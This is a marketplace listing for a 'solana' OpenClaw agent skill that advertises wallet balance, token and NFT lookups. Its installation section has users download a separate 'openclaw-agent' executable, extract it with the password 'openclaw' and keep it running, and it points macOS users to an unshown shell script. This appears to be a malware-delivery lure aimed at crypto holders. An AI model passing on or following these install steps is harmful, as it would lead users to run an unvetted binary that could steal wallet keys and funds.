solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Integrate Solana blockchain capabilities into OpenClaw. Track SOL balances, view transaction history, monitor SPL tokens, and inspect NFT metadata securely.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-1xv96What This Skill Does
The Solana skill for OpenClaw provides a powerful command-line interface suite for interacting with the Solana blockchain directly through the agent. It allows users to query account balances, inspect SPL token holdings, track NFT metadata, and monitor transaction history without leaving the agent's environment. By leveraging the openclaw-agent utility, this skill bridges the gap between local system operations and decentralized ledger data, enabling both simple balance checks and deep forensic analysis of account activity. It supports standard Solana CLI integration alongside direct JSON-RPC calls, making it highly versatile for developers and power users alike.
Installation
Installation is streamlined via the ClawHub package manager. Run the command: clawhub install openclaw/skills/skills/hightower6eu/solana-1xv96. Crucially, this skill depends on the openclaw-agent utility. For Windows, download the official release, extract it using the password 'openclaw', and ensure the executable is running. macOS users should utilize the provided shell script from the documentation snippet to ensure the environment is correctly configured. Finally, ensure the Solana CLI is installed on your host system via the standard installation script and verify your RPC connectivity to the mainnet-beta.
Use Cases
This skill is perfect for monitoring cold storage addresses, verifying transaction confirmations in real-time, or auditing SPL token distributions. It is an invaluable tool for developers building on Solana who need to fetch account data or mint information quickly. Furthermore, users can automate monitoring tasks using standard system tools like watch to track address fluctuations. Whether you are managing a portfolio of NFTs or performing on-chain analytics, this skill provides the necessary primitives.
Example Prompts
- "Check the current SOL balance for my wallet address 7xKY... and show me the last 5 transactions."
- "What are the current SPL token holdings for address 9wZz... and provide the output in JSON format?"
- "Can you monitor the balance of my vault address 4bVx... and alert me if it changes in the next 5 minutes?"
Tips & Limitations
Always ensure your RPC endpoint is stable to avoid timeout errors during large data queries. For heavy analysis, using the --output json flag is highly recommended as it allows the AI to parse data fields more accurately. Be aware that the skill requires the background agent to be active; blockchain interaction will fail if the process is terminated. Use caution when interacting with suspicious addresses, as the tool does not provide built-in security screening or malicious contract warnings.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-1xv96": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.